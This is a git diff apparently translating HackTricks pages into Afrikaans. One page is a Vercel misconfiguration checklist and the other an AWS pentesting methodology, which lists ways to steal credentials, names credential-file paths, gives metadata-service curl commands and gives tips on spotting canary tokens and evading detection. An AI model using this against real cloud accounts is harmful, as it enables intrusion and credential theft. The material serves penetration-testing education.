-  - **Misconfiguration:** Granting too many permissions to people that doesn't need it increases the risk of the vercel configuration. Check all the possible roles in [https://vercel.com/docs/accounts/team-members-and-roles/access-roles](https://vercel.com/docs/accounts/team-members-and-roles/access-roles)
-  - **Risk**: Increate the exposure of the Vercel Team
+- **Misconfiguration:** Te veel toestemmings aan mense wat dit nie nodig het nie, verhoog die risiko van die Vercel konfigurasie. Kontroleer al die moontlike rolle in [https://vercel.com/docs/accounts/team-members-and-roles/access-roles](https://vercel.com/docs/accounts/team-members-and-roles/access-roles)
+- **Risk**: Verhoog die blootstelling van die Vercel Span.
 
 ---
 
@@ -321,11 +318,11 @@ An **Access Group** in Vercel is a collection of projects and team members with
 
 **Potential Misconfigurations:**
 
-- **Over-Permissioning Members:** Assigning roles with more permissions than necessary, leading to unauthorized access or actions.
-- **Improper Role Assignments:** Incorrectly assigning roles that do not align with team members' responsibilities, causing privilege escalation.
-- **Lack of Project Segregation:** Failing to separate sensitive projects, allowing broader access than intended.
-- **Insufficient Group Management:** Not regularly reviewing or updating Access Groups, resulting in outdated or inappropriate access permissions.
-- **Inconsistent Role Definitions:** Using inconsistent or unclear role definitions across different Access Groups, leading to confusion and security gaps.
+- **Over-Permissioning Members:** Toeken van rolle met meer toestemmings as wat nodig is, wat lei tot ongeoorloofde toegang of aksies.
+- **Improper Role Assignments:** Onakkurate toekenning van rolle wat nie ooreenstem met spanlede se verantwoordelikhede nie, wat privilige eskalasie veroorsaak.
+- **Lack of Project Segregation:** Versuim om sensitiewe projekte te skei, wat breër toegang toelaat as wat bedoel is.
+- **Insufficient Group Management:** Nie gereeld hersiening of opdatering van Toegangsgroepe nie, wat lei tot verouderde of onvanpaste toegangstoestemmings.
+- **Inconsistent Role Definitions:** Gebruik van inkonsekwente of onduidelike rol definisies oor verskillende Toegangsgroepe, wat lei tot verwarring en sekuriteitsgappe.
 
 ---
 
@@ -334,8 +331,8 @@ An **Access Group** in Vercel is a collection of projects and team members with
 #### Security Configurations:
 
 - **Log Drains to third parties:**
-  - **Misconfiguration:** An attacker could configure a Log Drain to steal the logs
-  - **Risk:** Partial persistence
+- **Misconfiguration:** 'n Aanvaller kan 'n Log Drain konfigureer om die logs te steel.
+- **Risk:** Gedeeltelike volharding.
 
 ---
 
@@ -343,99 +340,95 @@ An **Access Group** in Vercel is a collection of projects and team members with
 
 #### Security Configurations:
 
-- **Team Email Domain:** When configured, this setting automatically invites Vercel Personal Accounts with email addresses ending in the specified domain (e.g., `mydomain.com`) to join your team upon signup and on the dashboard.
-  - **Misconfiguration:**&#x20;
-    - Specifying the wrong email domain or a misspelled domain in the Team Email Domain setting.
-    - Using a common email domain (e.g., `gmail.com`, `hotmail.com`) instead of a company-specific domain.
-  - **Risks:**
-    - **Unauthorized Access:** Users with email addresses from unintended domains may receive invitations to join your team.
-      - **Data Exposure:** Potential exposure of sensitive project information to unauthorized individuals.
-- **Protected Git Scopes:** Allows you to add up to 5 Git scopes to your team to prevent other Vercel teams from deploying repositories from the protected scope. Multiple teams can specify the same scope, allowing both teams access.
-  - **Misconfiguration:** Not adding critical Git scopes to the protected list.
+- **Team Email Domain:** Wanneer geconfigureer, nooi hierdie instelling outomaties Vercel Persoonlike Rekeninge met e-pos adresse wat eindig op die gespesifiseerde domein (bv. `mydomain.com`) is om jou span te sluit by registrasie en op die dashboard.
+- **Misconfiguration:** 
+- Spesifisering van die verkeerde e-pos domein of 'n verkeerd gespelde domein in die Span E-pos Domein instelling.
+- Gebruik van 'n algemene e-pos domein (bv. `gmail.com`, `hotmail.com`) in plaas van 'n maatskappy-spesifieke domein.
 - **Risks:**
-  - **Unauthorized Deployments:** Other teams may deploy repositories from your organization's Git scopes without authorization.
-  - **Intellectual Property Exposure:** Proprietary code could be deployed and accessed outside your team.
-- **Environment Variable Policies:** Enforces policies for the creation and editing of the team's environment variables. Specifically, you can enforce that all environment variables are created as **Sensitive Environment Variables**, which can only be decrypted by Vercel's deployment system.
-  - **Misconfiguration:** Keeping the enforcement of sensitive environment variables disabled.
-  - **Risks:**
-    - **Exposure of Secrets:** Environment variables may be viewed or edited by unauthorized team members.
-      - **Data Breach:** Sensitive information like API keys and credentials could be leaked.
-- **Audit Log:** Provides an export of the team's activity for up to the last 90 days. Audit logs help in monitoring and tracking actions performed by team members.
-  - **Misconfiguration:**\
-    Granting access to audit logs to unauthorized team members.
-  - **Risks:**
-    - **Privacy Violations:** Exposure of sensitive user activities and data.
-      - **Tampering with Logs:** Malicious actors could alter or delete logs to cover their tracks.
-- **SAML Single Sign-On:** Allows customization of SAML authentication and directory syncing for your team, enabling integration with an Identity Provider (IdP) for centralized authentication and user management.
-  - **Misconfiguration:** An attacker could backdoor the Team setting up SAML parameters such as Entity ID, SSO URL, or certificate fingerprints.
-  - **Risk:** Maintain persistence
-- **IP Address Visibility:** Controls whether IP addresses, which may be considered personal information under certain data protection laws, are displayed in Monitoring queries and Log Drains.
-  - **Misconfiguration:** Leaving IP address visibility enabled without necessity.
-  - **Risks:**
-    - **Privacy Violations:** Non-compliance with data protection regulations like GDPR.
-    - **Legal Repercussions:** Potential fines and penalties for mishandling personal data.
-- **IP Blocking:** Allows the configuration of IP addresses and CIDR ranges that Vercel should block requests from. Blocked requests do not contribute to your billing.
-  - **Misconfiguration:** Could be abused by an attacker to allow malicious traffic or block legit traffic.
-  - **Risks:**
-    - **Service Denial to Legitimate Users:** Blocking access for valid users or partners.
-    - **Operational Disruptions:** Loss of service availability for certain regions or clients.
+- **Unauthorized Access:** Gebruikers met e-pos adresse van onbedoelde domeine mag uitnodigings ontvang om by jou span aan te sluit.
+- **Data Exposure:** Potensiële blootstelling van sensitiewe projekinligting aan ongeoorloofde individue.
+- **Protected Git Scopes:** Laat jou toe om tot 5 Git scopes aan jou span toe te voeg om te voorkom dat ander Vercel spanne repositories van die beskermde omvang ontplooi. Meerdere spanne kan dieselfde omvang spesifiseer, wat beide spanne toegang gee.
+- **Misconfiguration:** Nie kritieke Git scopes aan die beskermde lys toe te voeg nie.
+- **Risks:**
+- **Unauthorized Deployments:** Ander spanne mag repositories van jou organisasie se Git scopes sonder toestemming ontplooi.
+- **Intellectual Property Exposure:** Beskermde kode kan ontplooi en buite jou span toeganklik wees.
+- **Environment Variable Policies:** Handhaaf beleide vir die skepping en redigering van die span se omgewing veranderlikes. Spesifiek, jy kan afdwing dat alle omgewing veranderlikes geskep word as **Sensitive Environment Variables**, wat slegs deur Vercel se ontplooiingstelsel gedekodeer kan word.
+- **Misconfiguration:** Hou die afdwinging van sensitiewe omgewing veranderlikes gedeaktiveer.
+- **Risks:**
+- **Exposure of Secrets:** Omgewing veranderlikes mag deur ongeoorloofde spanlede gesien of gewysig word.
+- **Data Breach:** Sensitiewe inligting soos API sleutels en akrediteer kan gelekt word.
+- **Audit Log:** Verskaf 'n uitvoer van die span se aktiwiteit vir tot die laaste 90 dae. Ouudit logs help om aksies wat deur spanlede uitgevoer is, te monitor en op te spoor.
+- **Misconfiguration:**\
+Gee toegang tot oudit logs aan ongeoorloofde spanlede.
+- **Risks:**
+- **Privacy Violations:** Blootstelling van sensitiewe gebruikersaktiwiteite en data.
+- **Tampering with Logs:** Kwaadwillige akteurs kan logs verander of verwyder om hul spore te bedek.
+- **SAML Single Sign-On:** Laat aanpassing van SAML autentisering en gids sinkronisering vir jou span toe, wat integrasie met 'n Identiteitsverskaffer (IdP) vir gesentraliseerde autentisering en gebruikersbestuur moontlik maak.
+- **Misconfiguration:** 'n Aanvaller kan 'n agterdeur in die Span instel deur SAML parameters soos Entity ID, SSO URL, of sertifikaat vingerafdrukke op te stel.
+- **Risk:** Handhaaf volharding.
+- **IP Address Visibility:** Beheer of IP adresse, wat as persoonlike inligting onder sekere dataprotectie wette beskou kan word, in Monitering navrae en Log Drains vertoon word.
+- **Misconfiguration:** Laat IP adres sigbaarheid geaktiveer sonder noodsaaklikheid.
+- **Risks:**
+- **Privacy Violations:** Nie-nakoming van dataprotectie regulasies soos GDPR.
+- **Legal Repercussions:** Potensiële boetes en sanksies vir verkeerde hantering van persoonlike data.
+- **IP Blocking:** Laat die konfigurasie van IP adresse en CIDR reekse toe wat Vercel moet blokkeer. Geblokkeerde versoeke dra nie by tot jou fakturering nie.
+- **Misconfiguration:** Kan deur 'n aanvaller misbruik word om kwaadwillige verkeer toe te laat of legitieme verkeer te blokkeer.
+- **Risks:**
+- **Service Denial to Legitimate Users:** Blokkeer toegang vir geldige gebruikers of vennote.
+- **Operational Disruptions:** Verlies van diens beskikbaarheid vir sekere streke of kliënte.
 
 ---
 
 ### Secure Compute
 
-**Vercel Secure Compute** enables secure, private connections between Vercel Functions and backend environments (e.g., databases) by establishing isolated networks with dedicated IP addresses. This eliminates the need to expose backend services publicly, enhancing security, compliance, and privacy.
+**Vercel Secure Compute** stel veilige, private verbindings tussen Vercel Funksies en agtergrond omgewings (bv. databasisse) in deur geïsoleerde netwerke met toegewyde IP adresse te vestig. Dit elimineer die behoefte om agtergrond dienste publiek bloot te stel, wat sekuriteit, nakoming, en privaatheid verbeter.
 
 #### **Potential Misconfigurations and Risks**
 
 1. **Incorrect AWS Region Selection**
-   - **Misconfiguration:** Choosing an AWS region for the Secure Compute network that doesn't match the backend services' region.
-   - **Risk:** Increased latency, potential data residency compliance issues, and degraded performance.
+- **Misconfiguration:** Kies 'n AWS streek vir die Secure Compute netwerk wat nie ooreenstem met die agtergrond dienste se streek nie.
+- **Risk:** Verhoogde latensie, potensiële data verblyf nakoming probleme, en verswakte prestasie.
 2. **Overlapping CIDR Blocks**
-   - **Misconfiguration:** Selecting CIDR blocks that overlap with existing VPCs or other networks.
-   - **Risk:** Network conflicts leading to failed connections, unauthorized access, or data leakage between networks.
+- **Misconfiguration:** Kies CIDR blokke wat oorvleuel met bestaande VPCs of ander netwerke.
+- **Risk:** Netwerk konflikte wat lei tot mislukte verbindings, ongeoorloofde toegang, of datalekke tussen netwerke.
 3. **Improper VPC Peering Configuration**
-   - **Misconfiguration:** Incorrectly setting up VPC peering (e.g., wrong VPC IDs, incomplete route table updates).
-   - **Risk:** Unauthorized access to backend infrastructure, failed secure connections, and potential data breaches.
+- **Misconfiguration:** Onakkurate opstelling van VPC peering (bv. verkeerde VPC ID's, onvolledige roete tabel opdaterings).
+- **Risk:** Ongeoorloofde toegang tot agtergrond infrastruktuur, mislukte veilige verbindings, en potensiële datalekke.
 4. **Excessive Project Assignments**
-   - **Misconfiguration:** Assigning multiple projects to a single Secure Compute network without proper isolation.
-   - **Risk:** Shared IP exposure increases the attack surface, potentially allowing compromised projects to affect others.
+- **Misconfiguration:** Toeken van meerdere projekte aan 'n enkele Secure Compute netwerk sonder behoorlike isolasie.
+- **Risk:** Gedeelde IP blootstelling verhoog die aanval oppervlak, wat moontlik gekompromitteerde projekte toelaat om ander te beïnvloed.
 5. **Inadequate IP Address Management**
-   - **Misconfiguration:** Failing to manage or rotate dedicated IP addresses appropriately.
-   - **Risk:** IP spoofing, tracking vulnerabilities, and potential blacklisting if IPs are associated with malicious activities.
+- **Misconfiguration:** Versuim om toegewyde IP adresse behoorlik te bestuur of te roteer.
+- **Risk:** IP spoofing, opsporing kwesbaarhede, en potensiële swartlys as IP's geassosieer word met kwaadwillige aktiwiteite.
 6. **Including Build Containers Unnecessarily**
-   - **Misconfiguration:** Adding build containers to the Secure Compute network when backend access isn't required during builds.
-   - **Risk:** Expanded attack surface, increased provisioning delays, and unnecessary consumption of network resources.
+- **Misconfiguration:** Voeg bouhouers by die Secure Compute netwerk wanneer agtergrond toegang nie tydens boue benodig word nie.
+- **Risk:** Verhoogde aanval oppervlak, verhoogde voorsieningsvertraagings, en onnodige verbruik van netwerk hulpbronne.
 7. **Failure to Securely Handle Bypass Secrets**
-   - **Misconfiguration:** Exposing or mishandling secrets used to bypass deployment protections.
-   - **Risk:** Unauthorized access to protected deployments, allowing attackers to manipulate or deploy malicious code.
+- **Misconfiguration:** Blootstelling of verkeerde hantering van geheime wat gebruik word om ontplooiing beskermings te omseil.
+- **Risk:** Ongeoorloofde toegang tot beskermde ontplooiings, wat aanvallers toelaat om kwaadwillige kode te manipuleer of te ontplooi.
 8. **Ignoring Region Failover Configurations**
-   - **Misconfiguration:** Not setting up passive failover regions or misconfiguring failover settings.
-   - **Risk:** Service downtime during primary region outages, leading to reduced availability and potential data inconsistency.
+- **Misconfiguration:** Nie passiewe failover streke op te stel of failover instellings verkeerd te konfigureer nie.
+- **Risk:** Diens stilstand tydens primêre streek uitvalle, wat lei tot verminderde beskikbaarheid en potensiële datainkonsekwentheid.
 9. **Exceeding VPC Peering Connection Limits**
-   - **Misconfiguration:** Attempting to establish more VPC peering connections than the allowed limit (e.g., exceeding 50 connections).
-   - **Risk:** Inability to connect necessary backend services securely, causing deployment failures and operational disruptions.
+- **Misconfiguration:** Poging om meer VPC peering verbindings te vestig as die toegelate limiet (bv. meer as 50 verbindings).
+- **Risk:** Onvermoë om nodige agtergrond dienste veilig te verbind, wat ontplooiing mislukkings en operasionele onderbrekings veroorsaak.
 10. **Insecure Network Settings**
-    - **Misconfiguration:** Weak firewall rules, lack of encryption, or improper network segmentation within the Secure Compute network.
-    - **Risk:** Data interception, unauthorized access to backend services, and increased vulnerability to attacks.
+- **Misconfiguration:** Swak firewall reëls, gebrek aan versleuteling, of onvanpaste netwerk segmentasie binne die Secure Compute netwerk.
+- **Risk:** Data afluistering, ongeoorloofde toegang tot agtergrond dienste, en verhoogde kwesbaarheid vir aanvalle.
 
 ---
 
 ### Environment Variables
 
-**Purpose:** Manage environment-specific variables and secrets used by all the projects.
+**Purpose:** Bestuur omgewing-spesifieke veranderlikes en geheime wat deur al die projekte gebruik word.
 
 #### Security Configurations:
 
 - **Exposing Sensitive Variables**
-  - **Misconfiguration:** Prefixing sensitive variables with `NEXT_PUBLIC_`, making them accessible on the client side.
-  - **Risk:** Exposure of API keys, database credentials, or other sensitive data to the public, leading to data breaches.
+- **Misconfiguration:** Prefixing sensitive variables with `NEXT_PUBLIC_`, making them accessible on the client side.
+- **Risk:** Blootstelling van API sleutels, databasis akrediteer, of ander sensitiewe data aan die publiek, wat tot datalekke lei.
 - **Sensitive disabled**
-  - **Misconfiguration:** If disabled (default) it's possible to read the values of the generated secrets.
-  - **Risk:** Increased likelihood of accidental exposure or unauthorized access to sensitive information.
+- **Misconfiguration:** As gedeaktiveer (standaard) is dit moontlik om die waardes van die gegenereerde geheime te lees.
+- **Risk:** Verhoogde waarskynlikheid van toevallige blootstelling of ongeoorloofde toegang tot sensitiewe inligting.
 
 {{#include ../banners/hacktricks-training.md}}
-
-
-
-
diff --git a/src/pentesting-cloud/aws-security/README.md b/src/pentesting-cloud/aws-security/README.md
index ad71de826..09bc05707 100644
--- a/src/pentesting-cloud/aws-security/README.md
+++ b/src/pentesting-cloud/aws-security/README.md
@@ -2,17 +2,17 @@
 
 {{#include ../../banners/hacktricks-training.md}}
 
-## Basic Information
+## Basiese Inligting
 
-**Before start pentesting** an **AWS** environment there are a few **basics things you need to know** about how AWS works to help you understand what you need to do, how to find misconfigurations and how to exploit them.
+**Voordat jy begin pentesting** 'n **AWS** omgewing, is daar 'n paar **basiese dinge wat jy moet weet** oor hoe AWS werk om jou te help verstaan wat jy moet doen, hoe om miskonfigurasies te vind en hoe om dit te benut.
 
-Concepts such as organization hierarchy, IAM and other basic concepts are explained in:
+Konsepte soos organisasiehiërargie, IAM en ander basiese konsepte word verduidelik in:
 
 {{#ref}}
 aws-basic-information/
 {{#endref}}
 
-## Labs to learn
+## Laboratoriums om te leer
 
 - [https://github.com/RhinoSecurityLabs/cloudgoat](https://github.com/RhinoSecurityLabs/cloudgoat)
 - [https://github.com/BishopFox/iam-vulnerable](https://github.com/BishopFox/iam-vulnerable)
@@ -22,49 +22,49 @@ aws-basic-information/
 - [http://flaws.cloud/](http://flaws.cloud/)
 - [http://flaws2.cloud/](http://flaws2.cloud/)
 
-Tools to simulate attacks:
+Gereedskap om aanvalle te simuleer:
 
 - [https://github.com/Datadog/stratus-red-team/](https://github.com/Datadog/stratus-red-team/)
 - [https://github.com/sbasu7241/AWS-Threat-Simulation-and-Detection/tree/main](https://github.com/sbasu7241/AWS-Threat-Simulation-and-Detection/tree/main)
 
-## AWS Pentester/Red Team Methodology
+## AWS Pentester/Red Team Metodologie
 
-In order to audit an AWS environment it's very important to know: which **services are being used**, what is **being exposed**, who has **access** to what, and how are internal AWS services an **external services** connected.
+Om 'n AWS omgewing te oudit, is dit baie belangrik om te weet: watter **dienste gebruik word**, wat is **blootgestel**, wie het **toegang** tot wat, en hoe is interne AWS dienste en **eksterne dienste** gekoppel.
 
-From a Red Team point of view, the **first step to compromise an AWS environment** is to manage to obtain some **credentials**. Here you have some ideas on how to do that:
+Vanuit 'n Red Team perspektief, is die **eerste stap om 'n AWS omgewing te kompromitteer** om daarin te slaag om 'n paar **akkrediteerbare** te verkry. Hier is 'n paar idees oor hoe om dit te doen:
 
-- **Leaks** in github (or similar) - OSINT
-- **Social** Engineering
-- **Password** reuse (password leaks)
-- Vulnerabilities in AWS-Hosted Applications
-  - [**Server Side Request Forgery**](https://book.hacktricks.xyz/pentesting-web/ssrf-server-side-request-forgery/cloud-ssrf) with access to metadata endpoint
-  - **Local File Read**
-    - `/home/USERNAME/.aws/credentials`
-    - `C:\Users\USERNAME\.aws\credentials`
-- 3rd parties **breached**
-- **Internal** Employee
-- [**Cognito** ](aws-services/aws-cognito-enum/#cognito)credentials
+- **Leaks** in github (of soortgelyk) - OSINT
+- **Sosiale** Ingenieurswese
+- **Wagwoord** hergebruik (wagwoordlekke)
+- Kw vulnerabilities in AWS-gehoste toepassings
+- [**Server Side Request Forgery**](https://book.hacktricks.xyz/pentesting-web/ssrf-server-side-request-forgery/cloud-ssrf) met toegang tot metadata-eindpunt
+- **Plaaslike Lêer Lees**
+- `/home/USERNAME/.aws/credentials`
+- `C:\Users\USERNAME\.aws\credentials`
+- 3de partye **gekompromitteer**
+- **Interne** Werknemer
+- [**Cognito** ](aws-services/aws-cognito-enum/#cognito)akkrediteerbare
 
-Or by **compromising an unauthenticated service** exposed:
+Of deur **'n nie-geauthentiseerde diens** wat blootgestel is te kompromitteer:
 
 {{#ref}}
 aws-unauthenticated-enum-access/
 {{#endref}}
 
-Or if you are doing a **review** you could just **ask for credentials** with these roles:
+Of as jy 'n **hersiening** doen, kan jy net **vraag vir akkrediteerbare** met hierdie rolle:
 
 {{#ref}}
 aws-permissions-for-a-pentest.md
 {{#endref}}
 
 > [!NOTE]
-> After you have managed to obtain credentials, you need to know **to who do those creds belong**, and **what they have access to**, so you need to perform some basic enumeration:
+> Nadat jy daarin geslaag het om akkrediteerbare te verkry, moet jy weet **aan wie behoort daardie akkrediteerbare**, en **waartoe hulle toegang het**, so jy moet 'n paar basiese enumerasie uitvoer:
 
-## Basic Enumeration
+## Basiese Enumerasie
 
 ### SSRF
 
-If you found a SSRF in a machine inside AWS check this page for tricks:
+As jy 'n SSRF in 'n masjien binne AWS gevind het, kyk na hierdie bladsy vir truuks:
 
 {{#ref}}
 https://book.hacktricks.xyz/pentesting-web/ssrf-server-side-request-forgery/cloud-ssrf
@@ -72,8 +72,7 @@ https://book.hacktricks.xyz/pentesting-web/ssrf-server-side-request-forgery/clou
 
 ### Whoami
 
-One of the first things you need to know is who you are (in where account you are in other info about the AWS env):
-
+Een van die eerste dinge wat jy moet weet is wie jy is (in watter rekening jy is en ander inligting oor die AWS omgewing):
 ```bash
 # Easiest way, but might be monitored?
 aws sts get-caller-identity
@@ -89,117 +88,113 @@ aws sns publish --topic-arn arn:aws:sns:us-east-1:*account id*:aaa --message aaa
 TOKEN=`curl -X PUT "http://169.254.169.254/latest/api/token" -H "X-aws-ec2-metadata-token-ttl-seconds: 21600"`
 curl -H "X-aws-ec2-metadata-token: $TOKEN" http://169.254.169.254/latest/dynamic/instance-identity/document
 ```
-
 > [!CAUTION]
-> Note that companies might use **canary tokens** to identify when **tokens are being stolen and used**. It's recommended to check if a token is a canary token or not before using it.\
-> For more info [**check this page**](aws-services/aws-security-and-detection-services/aws-cloudtrail-enum.md#honeytokens-bypass).
+> Let daarop dat maatskappye **kanarie tokens** kan gebruik om te identifiseer wanneer **tokens gesteel en gebruik** word. Dit word aanbeveel om te kontroleer of 'n token 'n kanarie token is of nie voordat jy dit gebruik.\
+> Vir meer inligting [**kyk na hierdie bladsy**](aws-services/aws-security-and-detection-services/aws-cloudtrail-enum.md#honeytokens-bypass).
 
-### Org Enumeration
+### Organisasie Enumerasie
 
 {{#ref}}
 aws-services/aws-organizations-enum.md
 {{#endref}}
 
-### IAM Enumeration
+### IAM Enumerasie
 
-If you have enough permissions **checking the privileges of each entity inside the AWS account** will help you understand what you and other identities can do and how to **escalate privileges**.
+As jy genoeg regte het, sal **die privileges van elke entiteit binne die AWS-rekening nagaan** jou help om te verstaan wat jy en ander identiteite kan doen en hoe om **privileges te verhoog**.
 
-If you don't have enough permissions to enumerate IAM, you can **steal bruteforce them** to figure them out.\
-Check **how to do the numeration and brute-forcing** in:
+As jy nie genoeg regte het om IAM te enumerate nie, kan jy dit **steal bruteforce** om dit uit te vind.\
+Kyk **hoe om die numerasie en bruteforcing** te doen in:
 
 {{#ref}}
 aws-services/aws-iam-enum.md
 {{#endref}}
 
 > [!NOTE]
-> Now that you **have some information about your credentials** (and if you are a red team hopefully you **haven't been detected**). It's time to figure out which services are being used in the environment.\
-> In the following section you can check some ways to **enumerate some common services.**
+> Nou dat jy **'n paar inligting oor jou akrediteer** (en as jy 'n rooi span is hoop ek jy **is nie opgespoor nie**). Dit is tyd om uit te vind watter dienste in die omgewing gebruik word.\
+> In die volgende afdeling kan jy 'n paar maniere kyk om **'n paar algemene dienste te enumerate.**
 
-## Services Enumeration, Post-Exploitation & Persistence
+## Dienste Enumerasie, Post-Exploitation & Persistensie
 
-AWS has an astonishing amount of services, in the following page you will find **basic information, enumeration** cheatsheets\*\*,\*\* how to **avoid detection**, obtain **persistence**, and other **post-exploitation** tricks about some of them:
+AWS het 'n verbasende hoeveelheid dienste, in die volgende bladsy sal jy **basiese inligting, enumerasie** cheatsheets\*\*,\*\* hoe om **opsporing te vermy**, **persistensie** te verkry, en ander **post-exploitation** truuks oor sommige van hulle vind:
 
 {{#ref}}
 aws-services/
 {{#endref}}
 
-Note that you **don't** need to perform all the work **manually**, below in this post you can find a **section about** [**automatic tools**](./#automated-tools).
+Let daarop dat jy **nie** al die werk **handmatig** hoef te doen nie, hieronder in hierdie pos kan jy 'n **afdeling oor** [**outomatiese gereedskap**](./#automated-tools) vind.
 
-Moreover, in this stage you might discovered **more services exposed to unauthenticated users,** you might be able to exploit them:
+Boonop, in hierdie fase mag jy **meer dienste ontdek wat aan nie-geverifieerde gebruikers blootgestel is,** jy mag in staat wees om dit te benut:
 
 {{#ref}}
 aws-unauthenticated-enum-access/
 {{#endref}}
 
-## Privilege Escalation
+## Privilege Verhoging
 
-If you can **check at least your own permissions** over different resources you could **check if you are able to obtain further permissions**. You should focus at least in the permissions indicated in:
+As jy **ten minste jou eie regte** oor verskillende hulpbronne kan **nagaan**, kan jy **nagaan of jy in staat is om verdere regte te verkry**. Jy moet ten minste fokus op die regte wat in:
 
 {{#ref}}
 aws-privilege-escalation/
 {{#endref}}
 
-## Publicly Exposed Services
+## Publiek Blootgestelde Dienste
 
-While enumerating AWS services you might have found some of them **exposing elements to the Internet** (VM/Containers ports, databases or queue services, snapshots or buckets...).\
-As pentester/red teamer you should always check if you can find **sensitive information / vulnerabilities** on them as they might provide you **further access into the AWS account**.
+Terwyl jy AWS-dienste enumerate, mag jy sommige van hulle gevind het wat **elemente aan die Internet blootstel** (VM/Containers poorte, databasisse of wagdiens, snapshots of emmers...).\
+As pentester/rooi spaner moet jy altyd kyk of jy **sensitiewe inligting / kwesbaarhede** op hulle kan vind aangesien dit jou **verdere toegang tot die AWS-rekening** kan bied.
 
-In this book you should find **information** about how to find **exposed AWS services and how to check them**. About how to find **vulnerabilities in exposed network services** I would recommend you to **search** for the specific **service** in:
+In hierdie boek behoort jy **inligting** te vind oor hoe om **blootgestelde AWS-dienste te vind en hoe om dit te kontroleer**. Oor hoe om **kwesbaarhede in blootgestelde netwerkdienste** te vind, sou ek jou aanbeveel om te **soek** na die spesifieke **diens** in:
 
 {{#ref}}
 https://book.hacktricks.xyz/
 {{#endref}}
 
-## Compromising the Organization
+## Kompromitering van die Organisasie
 
-### From the root/management account
+### Van die wortel/ bestuursrekening
 
-When the management account creates new accounts in the organization, a **new role** is created in the new account, by default named **`OrganizationAccountAccessRole`** and giving **AdministratorAccess** policy to the **management account** to access the new account.
+Wanneer die bestuursrekening nuwe rekeninge in die organisasie skep, word 'n **nuwe rol** in die nuwe rekening geskep, standaard genoem **`OrganizationAccountAccessRole`** en gee **AdministratorAccess** beleid aan die **bestuursrekening** om toegang tot die nuwe rekening te verkry.
 
 <figure><img src="../../images/image (171).png" alt=""><figcaption></figcaption></figure>
 
-So, in order to access as administrator a child account you need:
+So, om as administrateur toegang tot 'n kindrekening te verkry, moet jy:
 
-- **Compromise** the **management** account and find the **ID** of the **children accounts** and the **names** of the **role** (OrganizationAccountAccessRole by default) allowing the management account to access as admin.
-  - To find children accounts go to the organizations section in the aws console or run `aws organizations list-accounts`
-  - You cannot find the name of the roles directly, so check all the custom IAM policies and search any allowing **`sts:AssumeRole` over the previously discovered children accounts**.
-- **Compromise** a **principal** in the management account with **`sts:AssumeRole` permission over the role in the children accounts** (even if the account is allowing anyone from the management account to impersonate, as its an external account, specific `sts:AssumeRole` permissions are necessary).
+- **Kompromiteer** die **bestuurs** rekening en vind die **ID** van die **kindrekening** en die **name** van die **rol** (OrganizationAccountAccessRole per standaard) wat die bestuursrekening toelaat om as admin toegang te verkry.
+- Om kindrekeninge te vind, gaan na die organisasieseksie in die aws-konsol of voer `aws organizations list-accounts` uit.
+- Jy kan nie die name van die rolle direk vind nie, so kyk na al die persoonlike IAM-beleide en soek enige wat **`sts:AssumeRole` oor die voorheen ontdekte kindrekeninge** toelaat.
+- **Kompromiteer** 'n **hoof** in die bestuursrekening met **`sts:AssumeRole` toestemming oor die rol in die kindrekeninge** (selfs as die rekening enige iemand van die bestuursrekening toelaat om te verpersoonlik, aangesien dit 'n eksterne rekening is, is spesifieke `sts:AssumeRole` toestemmings nodig).
 
-## Automated Tools
+## Outomatiese Gereedskap
 
 ### Recon
 
-- [**aws-recon**](https://github.com/darkbitio/aws-recon): A multi-threaded AWS security-focused **inventory collection tool** written in Ruby.
-
+- [**aws-recon**](https://github.com/darkbitio/aws-recon): 'n multi-draad AWS sekuriteitsgefokusde **inventaris versamelingsgereedskap** geskryf in Ruby.
 ```bash
 # Install
 gem install aws_recon
 
 # Recon and get json
 AWS_PROFILE=<profile> aws_recon \
-  --services S3,EC2 \
-  --regions global,us-east-1,us-east-2 \
-  --verbose
+--services S3,EC2 \
+--regions global,us-east-1,us-east-2 \
+--verbose
 ```
-
-- [**cloudlist**](https://github.com/projectdiscovery/cloudlist): Cloudlist is a **multi-cloud tool for getting Assets** (Hostnames, IP Addresses) from Cloud Providers.
-- [**cloudmapper**](https://github.com/duo-labs/cloudmapper): CloudMapper helps you analyze your Amazon Web Services (AWS) environments. It now contains much more functionality, including auditing for security issues.
-
+- [**cloudlist**](https://github.com/projectdiscovery/cloudlist): Cloudlist is 'n **multi-cloud hulpmiddel om Bate** (Gasname, IP Adresse) van Cloud Verskaffers te verkry.
+- [**cloudmapper**](https://github.com/duo-labs/cloudmapper): CloudMapper help jou om jou Amazon Web Services (AWS) omgewings te analiseer. Dit bevat nou baie meer funksionaliteit, insluitend ouditering vir sekuriteitskwessies.
 ```bash
 # Installation steps in github
 # Create a config.json file with the aws info, like:
 {
-    "accounts": [
-        {
-            "default": true,
-            "id": "<account id>",
-            "name": "dev"
-        }
-    ],
-    "cidrs":
-    {
-        "2.2.2.2/28": {"name": "NY Office"}
-    }
+"accounts": [
+{
+"default": true,
+"id": "<account id>",
+"name": "dev"
+}
+],
+"cidrs":
+{
+"2.2.2.2/28": {"name": "NY Office"}
+}
 }
 
 # Enumerate
@@ -229,9 +224,7 @@ python3 cloudmapper.py public --accounts dev
 python cloudmapper.py prepare #Prepare webserver
 python cloudmapper.py webserver #Show webserver
 ```
-
-- [**cartography**](https://github.com/lyft/cartography): Cartography is a Python tool that consolidates infrastructure assets and the relationships between them in an intuitive graph view powered by a Neo4j database.
-
+- [**cartography**](https://github.com/lyft/cartography): Cartography is 'n Python-gereedskap wat infrastruktuur bates en die verhoudings tussen hulle in 'n intuïtiewe grafiekweergave saamvoeg, aangedryf deur 'n Neo4j-databasis.
 ```bash
 # Install
 pip install cartography
@@ -240,17 +233,15 @@ pip install cartography
 # Get AWS info
 AWS_PROFILE=dev cartography --neo4j-uri bolt://127.0.0.1:7687 --neo4j-password-prompt  --neo4j-user neo4j
 ```
-
-- [**starbase**](https://github.com/JupiterOne/starbase): Starbase collects assets and relationships from services and systems including cloud infrastructure, SaaS applications, security controls, and more into an intuitive graph view backed by the Neo4j database.
-- [**aws-inventory**](https://github.com/nccgroup/aws-inventory): (Uses python2) This is a tool that tries to **discover all** [**AWS resources**](https://docs.aws.amazon.com/general/latest/gr/glos-chap.html#resource) created in an account.
-- [**aws_public_ips**](https://github.com/arkadiyt/aws_public_ips): It's a tool to **fetch all public IP addresses** (both IPv4/IPv6) associated with an AWS account.
+- [**starbase**](https://github.com/JupiterOne/starbase): Starbase versamel bates en verhoudings van dienste en stelsels, insluitend wolkinfrastruktuur, SaaS-toepassings, sekuriteitsbeheer en meer in 'n intuïtiewe grafiekweergave wat deur die Neo4j-databasis ondersteun word.
